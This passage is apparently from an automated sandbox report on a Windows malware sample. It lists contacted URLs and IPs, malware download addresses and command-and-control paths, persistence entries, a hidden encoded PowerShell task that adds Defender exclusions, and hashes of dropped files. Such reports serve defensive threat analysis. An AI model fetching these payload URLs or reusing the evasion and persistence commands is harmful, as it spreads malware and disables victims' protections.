                          http://tempuri.org/Entity/Id8ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id24LRjqRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.216.214.225/freedom.exe-Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ip.sInstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.dropbox.com/SCerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.dropbox.com/KCerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id22ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id19ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id2LRjqRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://thizx13vt.top/:F3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://tempuri.org/Entity/Id20LRjqRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id14LRjqRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id13ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.dropbox.com/rCerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.entrust.net/ts1ca.crl0GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://direct-link.net/1218649/windows-latest-updateswinmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://thizx13vt.top/23546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://thizx13vt.top/)3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://aia.entrust.net/ts1-chain256.cer01GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.dropbox.com/(eCerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id22ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://thizx13vt.top/E3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://185.216.214.225/freedom.exejCerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://thizx13vt.top/F3546345.exe, 00000025.00000002.4775940501.0000000002441000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://185.216.214.225/freedom.exeryWt.exeCerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id13ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id16ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id23LRjqpRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://thizx13vt.top/S3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://tempuri.org/Entity/Id18ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://185.216.214.225/Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://thizx13vt.top/N3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://tempuri.org/Entity/Id3ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/rmRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          162.125.66.18
                          unknownUnited States
                          19679DROPBOXUSfalse
                          185.215.113.26
                          unknownPortugal
                          206894WHOLESALECONNECTIONSNLfalse
                          185.215.113.19
                          unknownPortugal
                          206894WHOLESALECONNECTIONSNLfalse
                          103.130.147.211
                          unknownTurkey
                          63859MYREPUBLIC-AS-IDPTEkaMasRepublikIDfalse
                          45.200.149.147
                          unknownSeychelles
                          328608Africa-on-Cloud-ASZAfalse
                          185.215.113.16
                          unknownPortugal
                          206894WHOLESALECONNECTIONSNLfalse
                          208.95.112.1
                          unknownUnited States
                          53334TUT-ASUSfalse
                          95.179.163.21
                          unknownNetherlands
                          20473AS-CHOOPAUStrue
                          82.147.85.52
                          unknownRussian Federation
                          31112SIBTEL-ASRUfalse
                          104.20.4.235
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          185.216.214.225
                          unknownGermany
                          205388SERVERDISCOUNTERserverdiscountercomDEfalse
                          193.176.158.185
                          unknownunknown
                          207451AGROSVITUAtrue
                          188.114.96.3
                          unknownEuropean Union
                          13335CLOUDFLARENETUSfalse
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1502163
                          Start date and time:2024-08-31 10:46:04 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 13m 48s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:57
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:wfJfUGeGT3.exe
                          renamed because original name is a hash value
                          Original Sample Name:046ebd7e0f619f33de609ea3f126b0d3.exe
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@95/66@0/13
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 94%
                          • Number of executed functions: 72
                          • Number of non-executed functions: 310
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                          • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Skipping network analysis since amount of network traffic is too extensive
                          TimeTypeDescription
                          04:46:52API Interceptor1x Sleep call for process: wfJfUGeGT3.exe modified
                          04:47:32API Interceptor4265x Sleep call for process: Shipment.pif modified
                          04:48:59API Interceptor2531x Sleep call for process: Cerker.exe modified
                          04:49:07API Interceptor474x Sleep call for process: winmsbt.exe modified
                          04:49:19API Interceptor1x Sleep call for process: IIZS2TRqf69aZbLAX3cf3edn.exe modified
                          04:49:54API Interceptor43x Sleep call for process: 3546345.exe modified
                          10:46:57Task SchedulerRun new task: Statistics path: wscript s>//B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
                          10:46:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url
                          10:48:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                          10:48:59Task SchedulerRun new task: Cerker.exe path: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                          10:49:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                          10:49:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                          10:49:32Task SchedulerRun new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                          10:49:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                          10:49:39Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          10:49:58Task SchedulerRun new task: mivyiofv path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAGUAeAB0AFMAaQBuAGsAXABFAG4AYwBvAGQAaQBuAGcALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATgBlAHgAdABTAGkAbgBrAFwARQBuAGMAbwBkAGkAbgBnAC4AZQB4AGUA
                          10:50:10Task SchedulerRun new task: Encoding path: C:\Users\user\AppData\Roaming\NextSink\Encoding.exe
                          10:51:32Task SchedulerRun new task: Windows path: C:\Users\user\Windows.exe
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          162.125.66.18https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0Get hashmaliciousHTMLPhisherBrowse
                            GMP Architecture MailBox System shared _PROPOSAL REQUEST PORTAL_ with you.emlGet hashmaliciousUnknownBrowse
                              https://www.dropbox.com/scl/fi/divczsjhc8wrt1wb18r2b/AT-Society-Directory.docx?rlkey=sjkzm3g8jkcekmsxm460sja78&st=r52leq64&dl=0Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                https://www.dropbox.com/l/scl/AAC7hFTuscUDDY6M1jF4WYmjaGusJYsDNvYGet hashmaliciousUnknownBrowse
                                  https://www.dropbox.com/l/scl/AAB-caRhWqrML98bRdmDd16YpJdQGQoNwfMGet hashmaliciousUnknownBrowse
                                    https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?Get hashmaliciousUnknownBrowse
                                      https://www.dropbox.com/l/scl/AAC7bZ0VQI_UDvxV34o89OGVuGeoyGILFFwGet hashmaliciousUnknownBrowse
                                        +10618189554_VM_Mbda-usVM.mp3.pdfGet hashmaliciousUnknownBrowse
                                          XCc5WuJdF7.exeGet hashmaliciousZhark RATBrowse
                                            XCc5WuJdF7.exeGet hashmaliciousZhark RATBrowse
                                              185.215.113.26Original_Build.exeGet hashmaliciousRaccoon Stealer v2Browse
                                              • 185.215.113.26/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                                              185.215.113.19SecuriteInfo.com.Win32.TrojanX-gen.17156.10149.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              SecuriteInfo.com.Win32.TrojanX-gen.11211.15058.exeGet hashmaliciousAmadey, StealcBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              SecuriteInfo.com.Win32.TrojanX-gen.15994.16518.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              SecuriteInfo.com.Win32.TrojanX-gen.17122.16457.exeGet hashmaliciousAmadey, PureLog Stealer, StealcBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              SecuriteInfo.com.Win32.TrojanX-gen.4650.358.exeGet hashmaliciousAmadey, PureLog Stealer, StealcBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              SecuriteInfo.com.Win32.TrojanX-gen.20423.9863.exeGet hashmaliciousAmadey, PureLog Stealer, Stealc, VidarBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              SecuriteInfo.com.Win32.TrojanX-gen.8387.16538.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              herso.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.19/Vi9leo/index.php
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              DROPBOXUShttps://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0Get hashmaliciousHTMLPhisherBrowse
                                              • 162.125.66.18
                                              GMP Architecture MailBox System shared _PROPOSAL REQUEST PORTAL_ with you.emlGet hashmaliciousUnknownBrowse
                                              • 162.125.1.20
                                              https://www.dropbox.com/scl/fi/divczsjhc8wrt1wb18r2b/AT-Society-Directory.docx?rlkey=sjkzm3g8jkcekmsxm460sja78&st=r52leq64&dl=0Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                              • 162.125.1.20
                                              https://www.dropbox.com/l/scl/AAC7hFTuscUDDY6M1jF4WYmjaGusJYsDNvYGet hashmaliciousUnknownBrowse
                                              • 162.125.21.1
                                              https://www.dropbox.com/l/scl/AAB-caRhWqrML98bRdmDd16YpJdQGQoNwfMGet hashmaliciousUnknownBrowse
                                              • 162.125.66.18
                                              https://dl.dropboxusercontent.com/scl/fi/i2zpknhy9u07fnzd16odr/Rechnungsnummer-DE230012940.zip?rlkey=so2rxiz6wbdl8wq5j881wuadq&st=f0ckmecz&dl=0Get hashmaliciousUnknownBrowse
                                              • 162.125.66.15
                                              https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?Get hashmaliciousUnknownBrowse
                                              • 162.125.66.15
                                              https://www.dropbox.com/l/scl/AAC7bZ0VQI_UDvxV34o89OGVuGeoyGILFFwGet hashmaliciousUnknownBrowse
                                              • 162.125.66.18
                                              +10618189554_VM_Mbda-usVM.mp3.pdfGet hashmaliciousUnknownBrowse
                                              • 162.125.21.1
                                              https://www.dropbox.com/l/scl/AADWaUTlzWcQZNBoJk7yo7JJzYq9pSy0xLYGet hashmaliciousUnknownBrowse
                                              • 162.125.6.18
                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              MYREPUBLIC-AS-IDPTEkaMasRepublikIDhttp://findmy-help-lcloud.com/DpW/Get hashmaliciousUnknownBrowse
                                              • 103.130.147.57
                                              jew.arm.elfGet hashmaliciousUnknownBrowse
                                              • 158.140.174.217
                                              BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                              • 158.140.171.55
                                              3igeJkzboL.elfGet hashmaliciousMiraiBrowse
                                              • 103.130.144.204
                                              hesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                              • 103.120.175.243
                                              hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                              • 103.120.175.243
                                              DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.120.175.243
                                              Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.120.175.243
                                              DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.120.175.243
                                              Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.120.175.243
                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.100
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exesetup.exeGet hashmaliciousXWormBrowse
                                                SecuriteInfo.com.Win32.TrojanX-gen.2935.18945.exeGet hashmaliciousAmadey, DarkTortilla, RedLine, XWormBrowse
                                                  C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeekBTbONX85.exeGet hashmaliciousXmrigBrowse
                                                    C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exefile.exeGet hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                        Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        File Type:ASCII text
                                                        Category:modified
                                                        Size (bytes):23
                                                        Entropy (8bit):3.82790978214397
                                                        Encrypted:false
                                                        SSDEEP:3:qIJMyAWRwo8n:q0CWRH8n
                                                        MD5:0B7D0E3C4F447BCF36DCA919DFEF1607
                                                        SHA1:17C3A0B1A4773EC4F168CDC24904B792FADC8F2E
                                                        SHA-256:4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
                                                        SHA-512:E6B37EB4F155A6F6F812721E97DB4CECDCBFEFE63C3F370E35D03CF20B858C08AAE82AFAD09043C55FF047A895827716D3003EE35A8C6D8B0724AB0CB4AC1B97
                                                        Malicious:false
                                                        Preview:Invalid request header.
                                                        Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):23
                                                        Entropy (8bit):3.82790978214397
                                                        Encrypted:false
                                                        SSDEEP:3:qIJMyAWRwo8n:q0CWRH8n
                                                        MD5:0B7D0E3C4F447BCF36DCA919DFEF1607
                                                        SHA1:17C3A0B1A4773EC4F168CDC24904B792FADC8F2E
                                                        SHA-256:4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
                                                        SHA-512:E6B37EB4F155A6F6F812721E97DB4CECDCBFEFE63C3F370E35D03CF20B858C08AAE82AFAD09043C55FF047A895827716D3003EE35A8C6D8B0724AB0CB4AC1B97
                                                        Malicious:false
                                                        Preview:Invalid request header.
                                                        Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):675840
                                                        Entropy (8bit):7.998216130139266
                                                        Encrypted:true
                                                        SSDEEP:12288:nQZ3hb7F0Rz5oquPojKv3rLMmVIhF2nde4S9MQfh0/Al2B4KtFejEqhPBBl0:G8zOFPOKzLM0k4dQf2B1E4q5Bs
                                                        MD5:8083FED730E151BF47528621DB8E7FF8
                                                        SHA1:4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6
                                                        SHA-256:AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
                                                        SHA-512:A36F22356558565A90107F3618D9D9AC8A20DA73616AA97A87D3EA41C8F444847A6BB56856FEAE87A1CA5C6CC748BF6CE1C43D5E348DD9EA80CDD3C3DBD0D47B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        Joe Sandbox View:
                                                        • Filename: ekBTbONX85.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..H............... .....@..... ....................................`...@......@............... ..................................n............................................................................................ ..H............text....G... ...H.................. ..`.rsrc...n............J..............@..@........................................H.......d[..x...........................................................8.#G..d..P.6.>..(.....=#..U...Ri..D.......H.x..7.z.)V.?2..t..s....A*]..4..rI0 P..h.s.u...;P......u...7....g....`........D..a..p.......nRa+5.ux.*r....!6...}...{...A.6.9../W8..'...e...U|.x+Tq...7+9G.t.....=...J....E[.._.....MX.....!@9..6.]..A.....t{."V.i...%..-.Ld$....q.....-.*.x.b.^}3:c_.D..k^....~.48A.u.R..dc.l....o.<. ...P.X...$H..vN.2...?y6.~Y."..3..............W.....CH'...;.... F*f......C.H.
                                                        Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):96256
                                                        Entropy (8bit):5.97238192300277
                                                        Encrypted:false
                                                        SSDEEP:1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
                                                        MD5:DB5717FD494495EEA3C8F7D4AB29D6B0
                                                        SHA1:39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
                                                        SHA-256:6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
                                                        SHA-512:B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 84%
                                                        Joe Sandbox View:
                                                        • Filename: setup.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Win32.TrojanX-gen.2935.18945.exe, Detection: malicious, Browse
